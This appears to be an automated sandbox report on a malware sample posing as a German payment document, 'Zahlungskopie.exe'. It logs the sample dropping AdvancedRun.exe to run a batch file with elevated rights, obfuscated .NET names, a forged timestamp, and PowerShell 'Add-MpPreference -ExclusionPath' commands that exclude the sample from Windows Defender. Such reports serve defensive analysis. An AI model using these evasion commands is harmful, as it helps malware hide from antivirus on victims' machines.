              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584
              Source: C:\Users\user\Desktop\Zahlungskopie.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Zahlungskopie.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Zahlungskopie.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.695170028.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr

              Data Obfuscation:

              Binary contains a suspicious time stamp
              Source: initial sampleStatic PE information: 0x80B55EFB [Sat Jun 5 16:59:39 2038 UTC]
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0040289F
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B564
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B58C
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B564
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B58C
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret 9_2_0040B51D
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05EDB0E8 push eax; retf 18_2_05EDB3BD
              Source: Zahlungskopie.exe, EyZTsSvYLRhPfexadI/LZOzpTcZilphUsgoqwIFl.cs High entropy of concatenated method names: '.ctor', 'cNKGwtsetjYpNrgPKkyOIeTUPHwgWGdhOcXWeKflHpauh', 'efpVfdJqtJRMHLWXwDUiZpjSGzsDatdyNHDqRbAaxyIne', 'rduoKTxAZiPWwpGLgpaFt', 'YZhFfucULBGVOovXoqz', 'GYOzOuvMUpqiILtemJEyuGnHibIak', 'NSZAZukAtlKIiEusYncVrKFLblsARFtNLJByjhIriETxTQm', 'bTpkNFfTcnzOcKIOSXWydWiQELMNRhRk', 'YrGCuFhFPzkVITpxVfFWTNXguiTtgkfvoQKdft', 'mPqJELmiLwoRMCVqktJw'
              Source: Zahlungskopie.exe, EyZTsSvYLRhPfexadI/MxZOaQWKTAURmBQTieArYFZawVbxqldLjouCuPLcV.cs High entropy of concatenated method names: 'HwqDiLEnYEbLs', 'OUhWjFqOFl', 'XyicTjeVNkYduOCXCKCoHngjtopganNRvtWI', '.ctor', '.cctor', 'URjMzdVbzHtEkTpryYkYOn', 'oBxSgQhuORpklXKqBbWmQNsKaboXNlWcWyXGcUkrnEMUJ', 'etNhwibCwAiNRe', 'BjxbGtiozMJzhM', 'UDiGPrXVjPqcVzXP'
              Source: Zahlungskopie.exe, EyZTsSvYLRhPfexadI/KHzUCwMEcEcAVMVeAPJOwQpV.cs High entropy of concatenated method names: 'get_IOAmKpwiEnAUAVuONIRnSmXEOl', 'get_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', 'set_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', '.ctor', '.cctor', 'trMvThSMWAPicKuvVIWiMyGrwSlNDieXnkVz', 'DIAxSEvMnoaKLyLOnlHTfexoHZtsLkOAyVsmiypicTdiRAc', 'fwpJcDbuylQTldbczAmQfyGPVyRlbow', 'gWoVwBMXwAUbWHwXZSaIrnmZXIUgekj', 'xXOJWhFBMDPplxKhzBRsaFfTKoYNGFSlrwehXAaSnzWNyWO'
              Source: Zahlungskopie.exe, EyZTsSvYLRhPfexadI/DpuOWGqcixGcjEqmPlEMDjqwzCTJywlJcdLlDAxOuUC.cs High entropy of concatenated method names: 'NXmwAzDYLIuafeswexsKbushgTfIoNP', '.ctor', 'xmdXAXQWOTVMPXIYbCDmzVoaJYDPjbgvCLPXJrlDfHOoB', 'eVfsdhNIjBXdnBuaNMAkdhLoKqZgSgayFdxfTtNtBnZGdJie', 'UbCbTRXGOxIcruXEIyWDHTtNRCULIHGQbXfxLlAQrwWeqkScb', 'vlmBnhjocpdVgQRbtpzhWmwMqwxIArcJGlvEzKYoi', 'JWxVlGfnpQDCUyYQOXKMGCXalzE', 'unBJqlYnqYReQrvlBygLNwOKNnCgYwJLbKaNgm', 'rWlIRXSTulrwCfNRYyQWcIvgrChtOGvxumOPCNXMUthrPCUEX', 'kMBXkjJAeroQyfOPUbprYpkBeb'
              Source: Zahlungskopie.exe, EyZTsSvYLRhPfexadI/MZbgkSVWpRbyCsAHycUWTrOSxWGpEkcTmojxPn.cs High entropy of concatenated method names: 'GjdYGbCfuyoVkvTAVljIomFrfOiloidSIPnMQtiRVQm', '.ctor', 'hJFlNFDKXCFvLnquzpqDmlTIF', 'DkhrgnfRrXyQdfNfGzJTC', 'sbxpHtyRHVPXGkvwtRpzE', 'tpSEvkCyFLkPckiKbyTHZ', 'KbJSxUsJnItXZLFLmjVtbkEhDamLrsvSEJojLXpkOsdQ', 'vflwfqmKLGJReKUgXVpYBspxvaoTLEIgOMxOQGafLgYa', 'weacvdRwOSTMVYJqYRacaKpYwfqVjmvupbrZlxHNmsVS', 'LTRXKhUfWaMPbGqNABFyrGXrqMtsoOstfLly'
              Source: Zahlungskopie.exe, PxSCePQMbEoKBmtQYyPYaMgBNscjQIRMPKCElPQXnvnpZHvMt/HOprFdrRBptzRhiPMosM.cs High entropy of concatenated method names: '.cctor', 'wrNkAPaGiYGXkxUupmcTYmiXANEYZouAcOwlxqgBtkgWT', 'AZdQGYgXZkiPJNkbGTEgVvbIWZgAzObcbGnFUiHvtfP', 'mdHGsrDqBQYeYuTHSGxlifOdAE', 'hyliMPGOFptNilLAlHiHzoaDMHDdXTCSNk', 'etdixjOEnfxpZwFCvrXHjlFaicKIvQUvYgHhizLxK', 'JMyosEHrhBPCVTNcauygjxkcqSPytWGzWzygLPy', 'dqeJtFvlNtfyqYEApnmb', 'MRTXkUpFwuGrkW', 'uPeNRwVHbenxqAsYiTzOMmxhyqPtMOotEOv'
              Source: C:\Users\user\Desktop\Zahlungskopie.exe File created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe Code function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_00401306
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe Code function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00408E31
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
